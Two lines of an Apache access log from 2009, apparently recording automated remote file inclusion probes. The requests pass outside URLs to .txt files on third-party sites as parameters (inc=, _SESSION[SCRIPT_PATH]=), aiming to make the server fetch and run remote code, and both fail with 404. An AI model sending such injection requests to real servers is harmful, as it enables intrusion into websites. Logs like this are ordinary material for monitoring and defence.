211.206.120.162 - - [16/Oct/2009:01:33:32 -0500] "GET /logs/access_log.1246406400//voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:01:33:38 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
